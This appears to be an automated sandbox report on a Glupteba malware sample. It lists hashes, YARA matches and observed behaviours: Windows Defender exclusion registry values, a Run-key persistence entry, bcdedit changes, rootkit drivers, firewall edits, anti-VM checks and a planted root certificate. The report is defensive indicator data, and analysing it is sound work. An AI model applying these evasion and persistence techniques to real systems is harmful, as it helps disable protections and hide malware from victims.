Analysis
-
max time kernel
149s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
22-12-2024 12:33
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe
-
Size
4.4MB
-
MD5
b96005666204d960371ae8b4d07aec2a
-
SHA1
8218741c3ca2e7f5aa03f2510ae48a9d853ff153
-
SHA256
0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8
-
SHA512
80d622ea1d45b948c0f1a096ebb81388871eeb53c136c7bca51a0766d38b072a7e3d70268edb136873dec6ac6c7b85b375747bbc3c55a8038aa82c8083dcc4fd
-
SSDEEP
98304:AzN7zsX8Vf01IR/Sm4p4/pBNiJlsxjz7F4yHoblySs:ozsMVf0+R2Wcox/7F4yGI
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba family
-
Glupteba payload 20 IoCs
resource yara_rule behavioral1/memory/1464-2-0x0000000004360000-0x0000000004C87000-memory.dmp family_glupteba behavioral1/memory/1464-3-0x0000000000400000-0x0000000000D42000-memory.dmp family_glupteba behavioral1/memory/1464-8-0x0000000000400000-0x0000000000D42000-memory.dmp family_glupteba behavioral1/memory/1464-7-0x0000000004360000-0x0000000004C87000-memory.dmp family_glupteba behavioral1/memory/1464-4-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/3032-20-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-54-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-69-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-80-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-100-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-106-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-107-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-108-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-109-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-110-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-111-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-112-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-113-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-114-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba behavioral1/memory/1636-115-0x0000000000400000-0x0000000002589000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\AgedShape = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe -
Modifies boot configuration data using bcdedit 14 IoCs
pid Process 1080 bcdedit.exe 340 bcdedit.exe 2384 bcdedit.exe 1528 bcdedit.exe 1160 bcdedit.exe 2100 bcdedit.exe 2432 bcdedit.exe 1868 bcdedit.exe 2344 bcdedit.exe 980 bcdedit.exe 1188 bcdedit.exe 1064 bcdedit.exe 2928 bcdedit.exe 1968 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\drivers\Winmon.sys csrss.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2720 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Executes dropped EXE 4 IoCs
pid Process 1636 csrss.exe 2176 patch.exe 1148 dsefix.exe 2984 injector.exe -
Loads dropped DLL 13 IoCs
pid Process 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 852 Process not Found 2176 patch.exe 2176 patch.exe 2176 patch.exe 2176 patch.exe 2176 patch.exe 2176 patch.exe 2176 patch.exe 2176 patch.exe 1636 csrss.exe 1636 csrss.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\AgedShape = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe = "0" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\AgedShape = "\"C:\\Windows\\rss\\csrss.exe\"" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
description ioc Process File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\rss JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe File created C:\Windows\rss\csrss.exe JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe File created C:\Windows\Logs\CBS\CbsPersist_20241222123328.cab makecab.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csrss.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe -
GoLang User-Agent 5 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 18 Go-http-client/1.1 HTTP User-Agent header 19 Go-http-client/1.1 HTTP User-Agent header 21 Go-http-client/1.1 HTTP User-Agent header 27 Go-http-client/1.1 HTTP User-Agent header 36 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d